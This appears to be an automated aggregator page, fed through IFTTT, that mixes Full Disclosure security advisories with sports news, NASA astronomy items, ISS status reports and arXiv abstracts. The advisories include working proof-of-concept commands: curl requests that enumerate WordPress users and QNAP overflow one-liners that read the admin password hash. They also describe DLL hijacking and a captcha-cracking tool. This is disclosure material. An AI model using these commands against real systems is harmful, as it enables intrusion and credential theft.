Details ================ Software: Stop User Enumeration Version: 1.3.4 Homepage: http://ift.tt/1PfeuEO Advisory report: http://ift.tt/2hTD5q8 CVE: Awaiting assignment CVSS: 5 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:N) Description ================ Stop User Enumeration does not stop user enumeration Vulnerability ================ Traditionally user enumeration of a WordPress site is done by making a series of requests to /?author=1 /?author=2 /?author=3 and so on (a similar effect can be achieved using POST requests too). WordPress 4.7 introduced a REST API endpoint to list all users. This plugin attempts to prevent requests with an author parameter (but fails), and makes no attempt at preventing requests to the REST API. Proof of concept ================ There are three ways to bypass this plugin’s protections. A GET request: $ curl -i -s \'http://localhost/?wp-comments-post&author=1\' HTTP/1.1 301 Moved Permanently Date: Fri, 23 Dec 2016 15:38:02 GMT Server: Apache/2.4.10 (Debian) X-Powered-By: PHP/7.0.13 Location: http://localhost/author/tomdxw/?wp-comments-post Content-Length: 0 Content-Type: text/html; charset=UTF-8 A POST request: $ curl -s http://localhost/?wp-comments-post -d author=1 | grep \'tomdxw – WP Test The REST API (new in WordPress 4.7): $ curl -s http://localhost/wp-json/wp/v2/users [{\"id\":1,\"name\":\"tomdxw\",\"url\":\"\",\"description\":\"\",\"link\":\"http:\\/\\/localhost\\/author\\/tomdxw\\/\",\"slug\":\"tomdxw\",\"avatar_urls\":{\"24\":\"http:\\/\\/2.gravatar.com\\/avatar\\/2b5450324939bb3d1352f377950c5503?s=24&d=mm&r=g\",\"48\":\"http:\\/\\/2.gravatar.com\\/avatar\\/2b5450324939bb3d1352f377950c5503?s=48&d=mm&r=g\",\"96\":\"http:\\/\\/2.gravatar.com\\/avatar\\/2b5450324939bb3d1352f377950c5503?s=96&d=mm&r=g\"},\"meta\":[],\"_links\":{\"self\":[{\"href\":\"http:\\/\\/localhost\\/wp-json\\/wp\\/v2\\/users\\/1\"}],\"collection\":[{\"href\":\"http:\\/\\/localhost\\/wp-json\\/wp\\/v2\\/users\"}]}}] Mitigations ================ Upgrade to version 1.3.5 or later. Disclosure policy ================ dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: http://ift.tt/1B6NWzd Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf. This vulnerability will be published if we do not receive a response to this report with 14 days. Timeline ================ 2016-12-23: Discovered 2016-12-23: Reported to vendor via info@fullworks.net 2016-12-23: Requested CVE 2016-12-23: Vendor first replied 2017-01-03: Vendor reported issue fixed in version 1.3.5 2017-01-04: Advisory published Discovered by dxw: ================ Tom Adams Please visit security.dxw.com for more information.

Source: Gmail -> IFTTT-> Blogger

Re: [FD] Persisted Cross-Site Scripting (XSS) in Confluence Jira Software

Hi Jodson, Am 03.01.2017 um 19:50 schrieb jlss: > =====[ Tempest Security Intelligence - ADV-3/2016 CVE-2016-6283 > ]============== > > Persisted Cross-Site Scripting (XSS) in Confluence Jira Software >

Source: Gmail -> IFTTT-> Blogger

Ravens: G John Urschel makes Forbes' "30 under 30" list in field of science; currently pursuing PHD at MIT (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Superheroes Anonymous

Showing 1-1 of 1 results for “Superheroes Anonymous”. Sorted by date added, Popularity, Relevance, Release date, Title, Author. Filters. Filter search ...

from Google Alert - anonymous http://ift.tt/2hRcl6H
via IFTTT

FTC sets $25,000 Prize for Automatic IoT Patch Management Solution

The U.S. Federal Trade Commission has announced a "prize competition" for creating a software or hardware-based solution with the ability to auto-patch vulnerable Internet of Things (IoT) devices. Today we are surrounded by a number of Internet-connected devices. Our homes are filled with tiny computers embedded in everything from security cameras, TVs and refrigerators to thermostat and door


from The Hacker News http://ift.tt/2iaIjvJ
via IFTTT

Clouds of Andromeda


The beautiful Andromeda Galaxy is often imaged by planet Earth-based astronomers. Also known as M31, the nearest large spiral galaxy is a familiar sight with dark dust lanes, bright yellowish core, and spiral arms traced by blue starlight. A mosaic of well-exposed broad and narrow-band image data, this colorful, premier portrait of our neighboring island universe offers strikingly unfamiliar features though, faint reddish clouds of glowing ionized hydrogen gas in the same wide field of view. Still, the ionized hydrogen clouds likely lie in the foreground of the scene, well within our Milky Way Galaxy. They could be associated with the pervasive, dusty interstellar cirrus clouds scattered hundreds of light-years above our own galactic plane. If they were located at the 2.5 million light-year distance of the Andromeda Galaxy they would be enormous, since the Andromeda Galaxy itself is 200,000 or so light-years across. via NASA http://ift.tt/2ia5kyQ

Pandora Close up at Saturn


What do the craters of Saturn's small moon Pandora look like up close? To help find out, NASA sent the robotic Cassini spacecraft, now orbiting Saturn, past the unusual moon two weeks ago. The highest resolution image of Pandora ever taken was then captured from about 40,000 kilometers out and is featured here. Structures as small as 300 meters can be discerned on 80-kilometer wide Pandora. Craters on Pandora appear to be covered over by some sort of material, providing a more smooth appearance than sponge-like Hyperion, another small moon of Saturn. Curious grooves and ridges also appear to cross the surface of the small moon. Pandora is partly interesting because, along with its companion moon Prometheus, it helps shepherd the particles of Saturn's F ring into a distinct ring. via NASA http://ift.tt/2j09Gs7

ISS Daily Summary Report – 1/3/2017

Extravehicular Activity (EVA) Preparations:  The USOS crew continued preparations for Friday’s EVA by auditing and configuring EVA tools, reviewing EVA Cuff Checklist procedures and participating in a conference with ground specialist.  Additionally, they checked out the Rechargeable EVA Battery Assemblies (REBAs) on Extravehicular Mobility Unit (EMU) suits 3006 and 3008 to verify the glove heaters are functional and helmet cameras are receiving power. Mobile Servicing System (MSS) Operations:  Yesterday and overnight (GMT 002-003), Robotics Ground Controllers powered up the MSS and operated the Space Station Remote Manipulator System (SSRMS) and the Special Purpose Dexterous Manipulator (SPDM) Body and Arm2 to remove a Nickel-Hydrogen (NiH2) battery from slot 3 on the 3A Integrated Electronics Assembly (IEA) and temporarily stow it on SPDM Enhanced ORU Temporary Platform (EOTP) Side 3.  They then removed a Lithium-Ion (Li-Ion) battery from Slot C on the H-II Transfer Vehicle 6 (HTV6) Exposed Pallet (EP) and installed it in Slot 3 of the 3A Integrated Electronics Assembly (IEA), this was the last Li-Ion battery that had to be installed in the 3A IEA.  The team is currently performing operations to drive the slot 1 and slot 5 H1 bolts with the ROST to complete the 3A pre-EVA robotics ops. Fluid Shifts – Baseline Imaging: The last of the three 49 Soyuz subjects performed their Baseline Imaging measurements with assistance from both onboard operators and ground remote guiders.  Ultrasound imaging was taken of arterial and venous measures of the head and neck, cardiac, ophthalmic and portal vein, and tissue thickness of lower and upper body. Additional measurements using the Cerebral and Cochlear Fluid Pressure (CCFP), Distortion Product Otoacoustic Emissions (DPOAE), Optical Coherence Tomography (OCT), ESA’s Cardiolab (CDL) Holter Arterial Blood Pressure Device, and Intraocular Pressure (IOP) using the tonometer were taken as well. Fluid Shifts is a joint NASA- Russian experiment that investigates the causes for severe and lasting physical changes to astronaut’s eyes. Because the headward fluid shift is a hypothesized contributor to these changes, reversing this fluid shift with a lower body negative pressure device is investigated as a possible intervention. Results from this study may help to develop preventative measures against lasting changes in vision and eye damage. European Space Agency (ESA) Education Payloads Operations (EPO): The crew reviewed the overview for the three EPO activities which make up the EXo-ISS – CERES, CrISStal and CatalISS.  They also installed the CERES experiment in the Veggie facility, fastening the Seed Support then watering the seeds.  The crew then prepared the CrISStal Salt Bag, dissolving the Seingnette salt then injecting the solution into the experiment bags. Finally, the crew initiated the CatalISS experiment by activating the CatalISS Gelatin Syringe by injecting degassed lemon-lime soda. CERES, is devoted to the study of plant growth; lentil, mustard, and radish seeds were selected having met the required criteria of rapid germination, vertical growth, and resistance to long-term storage. CrISStal, aims to demonstrate the role of gravity in growing crystals, where in microgravity growth is the same in all directions, giving a perfect regular shape of the crystal. The crystal grows in a liquid solution from saturated Rochelle salt. The student designed experiment, CatalISS, aims to prove the influence of gravity on the catalytic reactions. For this purpose, the experiment operates from catalysis of enzymes and gelatin for reaction with a duration of three days. Today’s Planned Activities All activities were completed unless otherwise noted. RБМП Ф1 absorption cartridge regeneration initiate Unstow of the EPO Pesquet Pouch for the Ceres, Crisstal, and Cataliss experiments. Fluid Shifts Ultrasound 2 HRF Rack 1 Power On Pre-treat tank [Е-К] and hose R&R in АСУ system, АСУ activation post R&R Fluid Shifts OCT Baseline Setup Reading of Big Picture Words for Ceres, Crisstal, Cataliss Fluid Shifts CDL Holter Arterial BP Hardware Don – Subject Fluid Shifts Ultrasound Baseline Scan Vozdukh [АВК СОА] valves service activation БД-2 adjustment for physical exercise Crew Medical Officer (CMO) Proficiency Training Fluid Shifts Ultrasound Baseline Scan – Operator Photo and Video Recording of Life on Station Regenerative Environmental Control and Life Support System (RGN) WSTA Fill PROFILAKTIKA-2. Assistance in experiment setup ИП-1 sensors positioning check Nikon Camera Time Sync Fluid Shifts CCFP Baseline Test PROFILAKTIKA-2. Closeout ops (assistance) Fluid Shifts OCT Baseline Exam Central Post Laptop Monthly Maintenance Log-files Downlink PELIKAN PL Photo Spectral System Battery Charge (init) Fluid Shifts DPOAE Baseline Test – Subject Fluid Shifts OCT Baseline Stow Fluid Shifts Tonometry Baseline Setup Fluid Shifts Tonometry Baseline Exam Fluid Shifts CDL Holter Arterial BP Hardware Doff – Subject Formaldehyde Monitoring Kit (FMK) Deployment Operations Grab Sample Container (GSC) Sampling Operations Veggie Hardware and display OBT Fluid Shifts Tonometry Baseline Stow Filling (separation) of ЕДВ (КОВ) for Elektron or ЕДВ-СВ Setup of the EPO Pesquet Ceres experiment Fluid Shifts CCFP Baseline Stow COTS UHF Communication Unit (CUCU) Circuit Breakers Close Regenerative Environmental Control and Life Support System (RGN) WSTA Fill СОЖ maintenance Progress 433 Stowage Ops (DC1) w/IMS update COTS UHF Communication Unit (CUCU) Circuit Breaker Open Extravehicular Activity (EVA) Tool Configuring Setup of the EPO Pesquet Crisstal Experiment. Public Affairs Office (PAO) High Definition (HD) Config LAB Setup PAO Preparation Public Affairs Office (PAO) Event in High Definition (HD) – Lab Setup of the Cataliss experiment Extravehicular Mobility Unit (EMU) Cuff Checklist Print Extravehicular Mobility Unit (EMU) Resize CONTENT. Experiment ops Rechargeable EVA Battery Assembly (REBA) Powered Hardware Checkout CCE Preparation Extravehicular Mobility Unit (EMU) Relocate Extravehicular Activity (EVA) Procedure Conference DUBRAVA. Observation and photography PELIKAN Observation and photography using Photo Spectral System БМП Ф1 absorption cartridge regeneration; (end) Completed Task List Items Commercial Generic Bioprocessing Apparatus 1, Compact Flash Card [Completed Saturday] Crew Provisions Relocate [Completed Saturday] LAB PS-120 label fix [Completed Saturday] Configuring the EVA GoPro Camera [Completed Saturday] COL1O2 Cleanup [Completed Saturday] Payload Hardware Relocate [Completed Saturday] Tropical Cyclone Ops Overview Review [Completed Saturday] On-Orbit Hearing Assessment (O-OHA) with EarQ Software Setup and Test [Completed Saturday] JEM CTB CONSOLIDATION [Completed Saturday] WiseNet Base Station Antenna Check [Completed Saturday] Cell Biology Experiment Facility (CBEF) Ventilation […]

from ISS On-Orbit Status Report http://ift.tt/2iI2R29
via IFTTT

Someone Hijacking Unsecured MongoDB Databases for Ransom

Nearly two years back, we warned users about publicly accessible MongoDB instances – almost 600 Terabytes (TB) – over the Internet which require no authentication, potentially leaving websites and servers at risk of hacking. These MongoDB instances weren't exposed due to any flaw in its software, but due to a misconfiguration (bad security practice) that let any remote attacker access MongoDB


from The Hacker News http://ift.tt/2hP0XrM
via IFTTT

[FD] Executable installers are vulnerable^WEVIL (case 45): ReadPDF's installers allow escalation of privilege

[FD] Executable installers are vulnerable^WEVIL (case 43): SoftMaker's Office service pack installers allow escalation of privilege

Re: [FD] 0-day: QNAP NAS Devices suffer of heap overflow

Read admin password from /etc/shadow (loaded in heap at address 0x0806ce56) [Remote Host]# echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i<4467;i++));do echo -en "B";done | base64 -w 0 ; echo -en "D\x56\xce\x06\x08" | base64 -w 0` HTTP/1.0\nHost: BUG\n\n" | ncat --ssl 192.168.5.7 443 | grep glibc *** glibc detected *** $1$$8lBa9PhdBbp9/AeeTXXXXX: free(): invalid next size (normal): 0x0806e510 *** [Remote Host]# Device: QNAP TS-251+ FW Version: QTS 4.2.2 (Build 20161214) /bashis And also; ================== [Stack overflow] ================== [Remote Host]# echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i<1489;i++));do echo -en "QUFB";done``echo -en "QUJCQkI="` HTTP/1.0\nHost: BUG\n\n” | ncat --ssl 192.168.5.7 443 HTTP/1.1 200 OK Date: Mon, 02 Jan 2017 11:59:24 GMT Content-Length: 0 Connection: close Content-Type: text/plain [Remote Host]# ==== [Local Host]# dmesg | grep 42424242 [161034.536318] cgi.cgi[28705]: segfault at 42424242 ip 00000000f6c1159b sp 00000000fffe84fc error 4 in libc-2.6.1.so[f6ba5000+12d000] [Local Host]# [QUJCQkI=] -> Base64encode -> [BBBB] Have a nice day /bashis

Source: Gmail -> IFTTT-> Blogger

Re: [FD] 0-day: QNAP NAS Devices suffer of heap overflow

And also; ================== [Stack overflow] ================== [Remote Host]# echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i<1489;i++));do echo -en "QUFB";done``echo -en "QUJCQkI="` HTTP/1.0\nHost: BUG\n\n” | ncat --ssl 192.168.5.7 443 HTTP/1.1 200 OK Date: Mon, 02 Jan 2017 11:59:24 GMT Content-Length: 0 Connection: close Content-Type: text/plain [Remote Host]# ==== [Local Host]# dmesg | grep 42424242 [161034.536318] cgi.cgi[28705]: segfault at 42424242 ip 00000000f6c1159b sp 00000000fffe84fc error 4 in libc-2.6.1.so[f6ba5000+12d000] [Local Host]# [QUJCQkI=] -> Base64encode -> [BBBB] Have a nice day /bashis

Source: Gmail -> IFTTT-> Blogger

[FD] Persisted Cross-Site Scripting (XSS) in Confluence Jira Software

=====[ Tempest Security Intelligence - ADV-3/2016 CVE-2016-6283 ]============== Persisted Cross-Site Scripting (XSS) in Confluence Jira Software

Source: Gmail -> IFTTT-> Blogger

[FD] Advisories Unsafe Dll in Audacity, telegram and Akamai

=====[ Tempest Security Intelligence - ADV-7/2016 ]============================= Unsafe DLL search path in Audacity 2.1.2 Author: Felipe Xavier Oliveira < engfilipeoliveira89 () gmail.com > Tempest Security Intelligence - Recife, Pernambuco - Brazil =====[ Table of Contents ]====================================================== 1. Overview 2. Detailed description 3. Further attack scenarios 4. Timeline of disclosure 5. Thanks & Acknowledgements 6. References =====[ 1. Overview ]============================================================ * System affected : Audacity [1]. * Software Version : 2.1.2 (other versions may also be affected). * Impact : A user may be infected by opening an audio file in Audacity, from an untrusted location i.e. usb flash drive, network file share. =====[ 2. Detailed description ]================================================ Audacity version 2.1.2 is vulnerable to DLL Hijack, it tries to load avformat-55.dll without supplying the absolute path, thus relying upon the presence of such DLL on the system directory. This behavior results in an exploitable DLL Hijack vulnerability, even if the SafeDllSerchMode flag is enabled. The vulnerability report can be found at the following URL: http://ift.tt/2hOxCOi Audacity neglected the risk associated with the vulnerability [2]. =====[ 3. Further attack scenarios ]============================================ The attacker can place a malicious dll named avformat-55.dll in the same folder of an Audacity project file. Upon opening the project file Audacity will load and execute the malicious code within its proccess context. The attack may be carried out remotely by inducing the victim to open the project file from an external storage device or a network file share. =====[ 4. Timeline of disclosure ]============================================== 08/15/2016 - Reported vulnerability. 08/15/2016 - Audacity neglected the risk. 12/11/2016 - Advisory publication date. =====[ 5. Thanks & Acknowledgements ]=========================================== - Breno Cunha < brenodario () gmail.com > - Felipe Azevedo < felipe3gomes () gmail.com > - Tempest Security Intelligence / Tempest's Pentest Team [3] =====[ 6. References ]========================================================== [1] http://ift.tt/1QxMVWY [2] http://ift.tt/2hOxCOi [3] http://ift.tt/1h6Hq1f =====[ EOF ]==================================================================== =====[ Tempest Security Intelligence - ADV-6/2016 ]============================= Unsafe DLL search path in Telegram Desktop 0.10.1 Author: Felipe Xavier Oliveira < engfilipeoliveira89 () gmail.com > Tempest Security Intelligence - Recife, Pernambuco - Brazil =====[ Table of Contents ]====================================================== 1. Overview 2. Detailed description 3. Timeline of disclosure 4. Thanks & Acknowledgements 5. References =====[ 1. Overview ]============================================================ * System affected : Telegram Desktop. * Platform : Windows. * Software Version : 0.10.1 (other versions may also be affected). * Impact : If a low privileged user is infected, a malware is capable of injecting code into Telegram process (and steal Telegram messages) without the need of privilege escalation (i.e. ability to write to Program Files and/or system32). =====[ 2. Detailed description ]================================================ Telegram Desktop version 0.10.1 is vulnerable to DLL Hijack, it tries to load "COMBASE.dll" without supplying the absolute path, thus relying upon the presence of such DLL on the system directory. The issue is aggravated on Windows 7 because the DLL is not present, resulting in an exploitable DLL Hijack vulnerability, even though the SafeDllSerchMode flag is enabled. =====[ 3. Timeline of disclosure ]============================================== 08/11/2016 - Reported vulnerability [1]. 08/14/2016 - Telegram fixed vulnerability [2]. 12/11/2016 - Advisory publication date. 16/12/2016 - CVE assigned [3]. =====[ 4. Thanks & Acknowledgements ]=========================================== - Breno Cunha < brenodario () gmail.com > - Felipe Azevedo < felipe3gomes () gmail.com > - Tempest Security Intelligence / Tempest's Pentest Team [4] =====[ 5. References ]========================================================== [1] http://ift.tt/2iy3QRJ [2] http://ift.tt/2hOqp0D [3] http://ift.tt/2iy2xCE [4] http://ift.tt/1h6Hq1f =====[ EOF ]==================================================================== =====[ Tempest Security Intelligence - ADV-8/2016 ]============================= Unsafe DLL search path in Akamai NetSession 1.9.3.1 Author: Felipe Xavier Oliveira < engfilipeoliveira89 () gmail.com > Tempest Security Intelligence - Recife, Pernambuco - Brazil =====[ Table of Contents ]====================================================== 1. Overview 2. Detailed description 3. Timeline of disclosure 4. Thanks & Acknowledgements 5. References =====[ 1. Overview ]============================================================ * System affected : Akamai NetSession [1]. * Software Version : 1.9.3.1 (other versions may also be affected). * Impact : If a low privileged user is infected, a malware is capable of injecting code into Akamai NetSession process without privilege elevation. =====[ 2. Detailed description ]================================================ Akamai Netsession 1.9.3.1 is vulnerable to DLL Hijack, it tries to load CSUNSAPI.dll without supplying the complete path. The issue is aggravated because the mentioned DLL is missing from its installation. Thus making it possible to hijack the DLL and subsequently inject code within Akamai NetSession process space. =====[ 3. Timeline of disclosure ]============================================= 09/23/2016 - Reported vulnerability to security@akamai.com. 09/23/2016 - Akamai acknowledges the vulnerability and asks for two weeks in order to fix the vulnerability. 10/07/2016 - Asked if they were able to fix it in the accorded time, but haven't heard back from them. 12/11/2016 - Advisory publication date. =====[ 4. Thanks & Acknowledgements ]=========================================== - Breno Cunha < brenodario () gmail.com > - Felipe Azevedo < felipe3gomes () gmail.com > - Tempest Security Intelligence / Tempest's Pentest Team [2] =====[ 5. References ]========================================================== [1] http://ift.tt/2hOsmuc interface-design.jsp [2] http://ift.tt/1h6Hq1f =====[ EOF ]==================================================================== Filipe Oliveira.

Source: Gmail -> IFTTT-> Blogger

[FD] CINtruder v0.3 released...

Dear list, I have released a new Captcha Intruder (CINtruder) code. It includes a complete Web User Interface (GUI) and some advanced features for: update, manage dictionaries, etc. http://ift.tt/2iklitx If you're not already familiar with CINtruder, please read the DESCRIPTION section below. [ DOWNLOAD ] You can download the new Captcha Intruder here: git clone http://ift.tt/2iydap0 http://ift.tt/2iBZpUh + http://ift.tt/2hQIO08 http://ift.tt/2iBRq9N + http://ift.tt/2hQMUVU [ DESCRIPTION ] Captcha Intruder is a free software[0] automatic pentesting tool to bypass captchas. It uses Optical Character Recognition (OCR)[1] techniques to process images into computer language and brute-forcing methods to compare them with a dictionary. To do that it only requires a few libraries: python-pycurl - Python bindings to libcurl python-libxml2 - Python bindings for the GNOME XML library python-imaging - Python Imaging Library sudo apt-get install python-pycurl python-libxml2 python-imaging Here are some of CINtruder's features: + Proxy Socks (for example, to connect to the TOR network) + Spoofed HTTP header values + Web User Interface (GUI) + Automatic update + Download captchas from url (tracking) + Apply different OCR algorithms (training + cracking) + Cracking captchas: local + remote + List/Set existing OCR specific modules (example provided) + Export results to XML + Replace suggested word on commands of another tool + [...] With Captcha Intruder a security researcher can solves a captcha on a form and pass that "cracked" parameter immediately to another tool. For example, if you want to launch a sqlmap to search for SQLi and there is a captcha, you can handler both tools like this (using flag: CINT): $ ./cintruder --crack "http://ift.tt/2iBOaLx" --tool "sqlmap -u http://ift.tt/2hQM9w8" [ SCREENSHOTS ] [http://ift.tt/2iBR3M8] Banner: http://ift.tt/2hQKK8G GUI-Training: http://ift.tt/2iBLcqj GUI-Cracking: http://ift.tt/2hQOFm0 [ EXAMPLES ] [http://ift.tt/2iBTUoy] * View help: ./cintruder --help * Update to latest version: ./cintruder --update * Launch web interface (GUI): ./cintruder --gui * Simple crack from url, with proxy TOR and verbose output: ./cintruder --crack "http://ift.tt/2iBOaLx" --proxy="http://127.0.0.1:8118" -v * Replace suggested word by CIntruder after cracking a remote url on commands of another tool (ex: "XSSer"): $ ./cintruder --crack "http://ift.tt/2iBOaLx" --tool "xsser -u http://ift.tt/2hQM9w8" [ DONATIONS ] This initiative depends on donations in order to be able to pay the server infrastructure. BTC: 19aXfJtoYJUoXEZtjNwsah2JKN9CK5Pcjw [ REFERENCES ] [0] http://ift.tt/2hQXQD1 [1] http://ift.tt/1Bb0yEx -

Source: Gmail -> IFTTT-> Blogger

[FD] Zend Framework / zend-mail < 2.4.11 Remote Code Execution (CVE-2016-10034)

Zend Framework < 2.4.11 Remote Code Execution (CVE-2016-10034) zend-mail < 2.7.2 Discovered by Dawid Golunski (@dawid_golunski) http://ift.tt/2fcYckq Desc: An independent research uncovered a critical vulnerability in zend-mail, a Zend Framework's component that could potentially be used by (unauthenticated) remote attackers to achieve remote arbitrary code execution in the context of the web server user and remotely compromise the target web application. To exploit the vulnerability an attacker could target common website components such as contact/feedback forms, registration forms, password email resets and others that send out emails with the help of a vulnerable version of the zend-mail class. Full advisory / PoC exploit at: http://ift.tt/2iBVwhW Video / PoC: http://ift.tt/2hQFORt For updates, follow: https://twitter.com/dawid_golunski

Source: Gmail -> IFTTT-> Blogger

Tuesday, January 3, 2017

I have a new follower on Twitter


MW 🇺🇸
What I if told you... You just read that wrong. If I follow you, follow back please! ..................... By the way, who eats a sandwich without Miracle Whip?
Minnesota, USA

Following: 3020 - Followers: 3001

January 03, 2017 at 11:39PM via Twitter http://twitter.com/Wrede93

Okay Anonymous, Now Is The Time To Help Us Stop Trump

So far, the Anonymous collective's efforts vs. Donald Trump have been mixed, to say the least. But with Shaun King and others now actively calling for ...

from Google Alert - anonymous http://ift.tt/2hNE9J8
via IFTTT

Truthful Facility Location with Additive Errors. (arXiv:1701.00529v1 [cs.GT])

We address the problem of locating facilities on the $[0,1]$ interval based on reports from strategic agents. The cost of each agent is her distance to the closest facility, and the global objective is to minimize either the maximum cost of an agent or the social cost.

As opposed to the extensive literature on facility location which considers the multiplicative error, we focus on minimizing the worst-case additive error. Minimizing the additive error incentivizes mechanisms to adapt to the size of the instance. I.e., mechanisms can sacrifice little efficiency in small instances (location profiles in which all agents are relatively close to one another), in order to gain more [absolute] efficiency in large instances. We argue that this measure is better suited for many manifestations of the facility location problem in various domains.

We present tight bounds for mechanisms locating a single facility in both deterministic and randomized cases. We further provide several extensions for locating multiple facilities.



from cs.AI updates on arXiv.org http://ift.tt/2hNNTTt
via IFTTT

Knowledge Engineering for Hybrid Deductive Databases. (arXiv:1701.00622v1 [cs.DB])

Modern knowledge base systems frequently need to combine a collection of databases in different formats: e.g., relational databases, XML databases, rule bases, ontologies, etc. In the deductive database system DDBASE, we can manage these different formats of knowledge and reason about them. Even the file systems on different computers can be part of the knowledge base. Often, it is necessary to handle different versions of a knowledge base. E.g., we might want to find out common parts or differences of two versions of a relational database.

We will examine the use of abstractions of rule bases by predicate dependency and rule predicate graphs. Also the proof trees of derived atoms can help to compare different versions of a rule base. Moreover, it might be possible to have derivations joining rules with other formalisms of knowledge representation.

Ontologies have shown their benefits in many applications of intelligent systems, and there have been many proposals for rule languages compatible with the semantic web stack, e.g., SWRL, the semantic web rule language. Recently, ontologies are used in hybrid systems for specifying the provenance of the different components.



from cs.AI updates on arXiv.org http://ift.tt/2ixafwC
via IFTTT

Finding Risk-Averse Shortest Path with Time-dependent Stochastic Costs. (arXiv:1701.00642v1 [cs.AI])

In this paper, we tackle the problem of risk-averse route planning in a transportation network with time-dependent and stochastic costs. To solve this problem, we propose an adaptation of the A* algorithm that accommodates any risk measure or decision criterion that is monotonic with first-order stochastic dominance. We also present a case study of our algorithm on the Manhattan, NYC, transportation network.



from cs.AI updates on arXiv.org http://ift.tt/2hNIEDg
via IFTTT

From Preference-Based to Multiobjective Sequential Decision-Making. (arXiv:1701.00646v1 [cs.AI])

In this paper, we present a link between preference-based and multiobjective sequential decision-making. While transforming a multiobjective problem to a preference-based one is quite natural, the other direction is a bit less obvious. We present how this transformation (from preference-based to multiobjective) can be done under the classic condition that preferences over histories can be represented by additively decomposable utilities and that the decision criterion to evaluate policies in a state is based on expectation. This link yields a new source of multiobjective sequential decision-making problems (i.e., when reward values are unknown) and justifies the use of solving methods developed in one setting in the other one.



from cs.AI updates on arXiv.org http://ift.tt/2ixayHP
via IFTTT

A pre-semantics for counterfactual conditionals and similar logics. (arXiv:1701.00696v1 [cs.AI])

The elegant Stalnaker/Lewis semantics for counterfactual conditonals works with distances between models. But human beings certainly have no tables of models and distances in their head. We begin here an investigation using a more realistic picture, based on findings in neuroscience. We call it a pre-semantics, as its meaning is not a description of the world, but of the brain, whose structure is (partly) determined by the world it reasons about.



from cs.AI updates on arXiv.org http://ift.tt/2hNwavE
via IFTTT

Simulated Tornado Optimization. (arXiv:1701.00736v1 [math.OC])

We propose a swarm-based optimization algorithm inspired by air currents of a tornado. Two main air currents - spiral and updraft - are mimicked. Spiral motion is designed for exploration of new search areas and updraft movements is deployed for exploitation of a promising candidate solution. Assignment of just one search direction to each particle at each iteration, leads to low computational complexity of the proposed algorithm respect to the conventional algorithms. Regardless of the step size parameters, the only parameter of the proposed algorithm, called tornado diameter, can be efficiently adjusted by randomization. Numerical results over six different benchmark cost functions indicate comparable and, in some cases, better performance of the proposed algorithm respect to some other metaheuristics.



from cs.AI updates on arXiv.org http://ift.tt/2ixkVLM
via IFTTT

How NOT To Evaluate Your Dialogue System: An Empirical Study of Unsupervised Evaluation Metrics for Dialogue Response Generation. (arXiv:1603.08023v2 [cs.CL] UPDATED)

We investigate evaluation metrics for dialogue response generation systems where supervised labels, such as task completion, are not available. Recent works in response generation have adopted metrics from machine translation to compare a model's generated response to a single target response. We show that these metrics correlate very weakly with human judgements in the non-technical Twitter domain, and not at all in the technical Ubuntu domain. We provide quantitative and qualitative results highlighting specific weaknesses in existing metrics, and provide recommendations for future development of better automatic evaluation metrics for dialogue systems.



from cs.AI updates on arXiv.org http://ift.tt/1PBZSwK
via IFTTT

Poset-based Triangle: An Improved Alternative for Bilattice-based Triangle. (arXiv:1609.05616v2 [cs.AI] UPDATED)

Bilattice-based triangle provides elegant algebraic structure for reasoning with vague and uncertain information. But the truth and knowledge ordering of intervals in bilattice-based triangle can not deal with nonmonotonic reasoning and are not always intuitive. In this work, we construct an alternative algebraic structure, namely poset-based triangle and we provide with proper logical connectives for this. It as an enhancement of the bilattice-based triangle to handle nonmonotonicity in logical reasoning.



from cs.AI updates on arXiv.org http://ift.tt/2cZKTGH
via IFTTT

Learning to Play Guess Who? and Inventing a Grounded Language as a Consequence. (arXiv:1611.03218v3 [cs.AI] UPDATED)

Learning your first language is an incredible feat and not easily duplicated. Doing this using nothing but a few pictureless books, a corpus, would likely be impossible even for humans. As an alternative we propose to use situated interactions between agents as a driving force for communication, and the framework of Deep Recurrent Q-Networks (DRQN) for learning a common language grounded in the provided environment. We task the agents with interactive image search in the form of the game Guess Who?. The images from the game provide a non trivial environment for the agents to discuss and a natural grounding for the concepts they decide to encode in their communication. Our experiments show that it is possible to learn this task using DRQN and even more importantly that the words the agents use correspond to physical attributes present in the images that make up the agents environment.



from cs.AI updates on arXiv.org http://ift.tt/2eGC8Nq
via IFTTT

Staying Anonymous Online

Is using a web anonymizer like Tor or one of its alternatives, enough to keep you truly anonymous online? Does a VPN make you anonymous?

from Google Alert - anonymous http://ift.tt/2hNtWwc
via IFTTT

Ravens will retain OC Marty Mornhinweg, DC Dean Pees and special teams coach Jerry Rosburg (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Ravens Video: Steve Smith Sr. explains about walking away from the game on his own terms and things he won't miss (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Ravens WR Steve Smith Sr. joins Mike and Mike, addresses recent retirement; listen live in the ESPN App (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

ISS Daily Summary Report – 12/30/2016

Extravehicular Activity (EVA) Preparations:  The USOS Crew prepared the Equipment Lock, Extravehicular Mobility Units (EMU), and ancillary hardware to support the upcoming Battery Upgrade EVA scheduled for Friday, January 6th.   In addition, they conducted an EMU On-Orbit Fit Verification (OFV) in order to confirm the correct sizing on EMUs 3006 and 3008.  Fluid Shifts – Baseline Imaging: The second of three 49Soyuz subjects performed their Baseline Imaging measurements with assistance from both onboard operators and ground remote guiders.  Ultrasound imaging was taken of arterial and venous measures of the head and neck, cardiac, ophthalmic and portal vein, and tissue thickness of lower and upper body. Additional measurements using the Cerebral and Cochlear Fluid Pressure (CCFP), Distortion Product Otoacoustic Emissions (DPOAE), Optical Coherence Tomography (OCT), ESA’s Cardiolab (CDL) Holter Arterial Blood Pressure Device, and Intraocular Pressure (IOP) using the tonometer were taken as well. Fluid Shifts is a joint NASA-Russian experiment that investigates the causes for severe and lasting physical changes to astronaut’s eyes. Because the headward fluid shift is a hypothesized contributor to these changes, reversing this fluid shift with a lower body negative pressure device is investigated as a possible intervention. Results from this study may help to develop preventative measures against lasting changes in vision and eye damage. Fine Motor Skills: The crew performed their weekly Fine Motor Skills tests, performing a series of interactive tasks on a touchscreen tablet. The 